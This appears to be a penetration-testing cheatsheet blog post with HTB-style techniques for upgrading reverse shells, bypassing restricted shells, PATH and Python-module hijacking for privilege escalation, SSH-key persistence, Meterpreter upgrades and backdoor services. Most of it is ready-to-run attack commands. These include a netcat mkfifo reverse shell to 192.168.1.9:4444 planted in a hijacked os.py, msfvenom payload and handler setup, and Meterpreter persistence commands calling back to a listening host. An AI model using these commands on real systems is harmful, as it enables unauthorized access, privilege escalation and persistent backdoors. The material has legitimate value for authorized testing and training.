Pentest Cheatsheet
Last updated on
Contents
This post is more like some techniques that could be useful.
For a guide to pentest each port click here!.
TTY Reverse Shell
Having an interactive shell is pretty important as our connection won’t hang up when doing Ctrl + C (because it doesn’t handle pretty well the SIGINT signal), allows us to autocomplete the commands and the routes, STDERR is displayed, we have command history…
To upgrade it:
# IN REMOTE COMPUTER
python -c 'import pty; pty.spawn("/bin/bash");'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash");'
# Ctrl + Z
# This is to put the terminal in foreground
# IN OUR COMPUTER
stty raw -echo # This allows passing through STDIN and STDOUT to the other terminal
fg # We recover the Reverse Shell session
# IN REMOTE COMPUTER
reset
# If it asks for terminal type use: xterm-256terminal
export TERMINAL=bash
export TERM=xterm-256color
And that’s how you get TTY.
Bypassing restricted shells via SSH:
A way to bypass the restricted shell is:
ssh <user>@<IP> bash
Invoking command bash
via ssh gives us a ‘reverse shell’.
Path Hijacking
Sometimes when a file is executed as part of a routine (in a cron, a systemd, a daemon…) it might not run with the absolute path but with a relative one.
# Absolute Path
/bin/bash
# Relative Path
bash
Relative Path commands can be altered in such a way that we can modify the PATH variable to make the OS search bash
command in our directory first (PATH is read in order from left to right). This way you can make that routine execute your command instead of the original one.
# PATH example
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
This can be done with:
export PATH=$(pwd):$PATH
For example: In a server, in case there is a cron running fdisk
as root
, if you create a file called fdisk
with a reverse shell (could be another thing), it will connect to you and get it with root
access, as the script is being run by it.
Python modules Hijacking
This involves modifying or replacing a library that a Python script requires so that it executes our code.
Let’s say I have this script that is owned by another user:
#!/usr/bin/python
import os
print("Hello my friend!")
If somehow this script is running in a cronjob, we can trick it to execute our code as that other user.
How?
Taking into account this script is running by python
and not python3
we need to search for /usr/lib/python2.7/os.py
.
We can alter the behaviour of the script by:
- Modifying the
os
library: If we have to write access over the file we can just simply put our code at the end. - Replacing the
os
library: We may not have write access over the file but over the folder. In that case, we just have to create atest.py
, put our code at the end, and then replace the library:
mv test.py os.py
The code we can put at the end of the os
library to execute another code could be:
import os
# HERE THE CODE
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 4444 >/tmp/f")
Then when the script is ran by the cronjob, we would have a reverse shell!
An example of privilege escalation with this method is Friendzone HTB machine.
How to not loose a shell
If SSH is available we can copy our public key (usually in ~/.ssh/id_rsa.pub
) to the server, more specifically to ~/.ssh/authorized_keys
, doing so will let us SSH without the need of inputting a password or needing the private key.
To generate the keys in case we don’t have them, we run ssh-keygen
and it will create them automatically.
Reverse Shell to Meterpreter
1º Way
We can upgrade a rev. shell to meterpreter uploading a msf meterpreter shell and running it:
msfvenom -p <PAYLOAD> RHOST=<IP> LPORT=<PORT> -f <FORMAT> > <FILE>.<EXTENSION>
A good reference for msfvenom use is this page.
Then we can upload it via an upload page the machine could have, curl, wget, netcat, scp, ftp, powershell… It’s up to you.
When we’ve uploaded it, it’s time to run it and listen on the port to get the meterpreter:
# ON MSFCONSOLE
use exploit/multi/handler
set LHOST <LISTENING IP>
set LPORT <LISTENING PORT>
set payload <PAYLOAD USED IN MSFVENOM>
run
And that should get us the met. shell.
2º Way
We can upload a another reverse but this time with payload ‘cmd’. When we get the connection with the cmd reverse shell:
#Putting the session on the background
background
#Upgrading cmd to meterpreter
sessions -u <ACTUAL CMD SESSION>
#After that, it should upgrade and get back to let us select between cmd or met.
#So we list the sessions to not fail.
sessions -l
#We select the one with description: meterpreter
sessions -i <MET. SESSION>
And there we are again!
Meterpreter on SSH
When having user and password it’s possible to manage ssh and upload files when wget or curl (for example) are restricted via a Metasploit Module or even with scp
command:
# Login in msf
msfconsole
# Use the module
use auxiliary/scanner/ssh/ssh_login
# Set parameters
set rhosts <remote ip>
set username <user>
set password <pass>
# 💥
run
# After creating session, upgrade it!
sessions -u <session>
Backdoor
A backdoor is a remote persistant connection, what it means is that we can connect to the machine even when we disconnect or the pc reboots, it’ll’ always be waiting for a connection or throwing it to us. There are service backdoors, web shells…
- Pupy.
- Tennc - Webshells
- xl7dev - Webshells
- Bartblaze - PHP
- Mattiasgeniar - PHP
- Meterpreter: In Windows we can migrate the meterpreter to another process and then make it persistent by installing a service:
# IN METERPRETER
ps
# WE TAKE THE PID OF EXPLORER.EXE (WINDOWS)
migrate <PID>
run metsvc
Or we can run:
# IN METERPRETER
run persistance -A -L c:\\ -X SECS -p <OPEN PORT> -r <LHOST>
# Checks connection every SECS seconds
And now we have a service listening on us.